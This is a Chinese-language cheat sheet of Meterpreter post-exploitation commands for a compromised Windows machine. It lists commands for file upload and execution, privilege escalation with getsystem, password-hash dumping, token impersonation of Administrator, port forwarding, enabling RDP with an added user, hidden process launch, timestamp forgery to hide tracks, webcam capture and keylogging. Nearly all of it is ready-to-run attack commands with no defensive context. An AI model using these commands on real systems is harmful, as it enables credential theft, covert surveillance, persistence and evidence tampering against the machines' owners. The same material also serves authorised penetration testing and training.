一、上传文件到windows主机

meterpreter > upload -r /home/liangzeyu.rtf c:\\

下载

meterpreter >  download -r c:\\liangzeyu.rtf

 执行文件

meterpreter > execute -f c:\\liangzeyu.exe

二、 创建cmd新通道

execte -f cmd -c  或者shell

三、显示进程数

ps 

四、 获取admin权限（提权）

getsystem

五、 获取用户密码
 

hashdump 可以获取用户密码，转换hash值

六、端口转发

 portfwd add -l 6666 -p 3389 -r 127.0.0.1 

删除端口转发

 portfwd delete -l 6666 -p 3389 -r 127.0.0.1

七、在目标主机搜索文件

 search -f liangzeyu.*

八、获取用户id 

getuid

九、 获取系统信息

sysinfo

十、模拟任意用户（token操作）

getuid  获取用户id 
use incognito 
list_tokens -u   查看所有用户列表
impersonate_token "WIN-7PLJUR8G6DH\Administrator"  切换admin用户
getuid  获取用户id  

##如果用admin用户切换system用户的话需要先使用getsystem提权

十一、 webcam摄像头

webcam_list  查看摄像头列表
webcam_snap 通过摄像头拍照
webcam_stream 通过摄像头开启视频

十二、执行文件

 execute -H -i -f cmd.exe #创建新进程 cmd.exe，-H不可见，-i 交互 （加了-i会弹出对话框）

十三、 伪造时间（将另一个文件的时间拷贝给另一个文件）

timestomp c:// -h 查看帮助
timestomp -v c:\\2.txt  查看时间戳
timestomp c:\\2.txt -f c:\\1.txt 将1.txt文件时间戳复制给2.txt时间戳

十四、 enable_rdp 脚本开启3389端口

run post/windows/manage/enable_rdp #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=test2 PASSWORD=123456 #添加用户
       添加成功后进入shell，使用net user查看用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662  #将3389端口转发到6662

 十五、键盘记录

keyscan_start 开始监听
keyscan_dump 下载监听到的内容
keyscan_stop   停止监听

 其他mfs命令
https://xz.aliyun.com/t/2536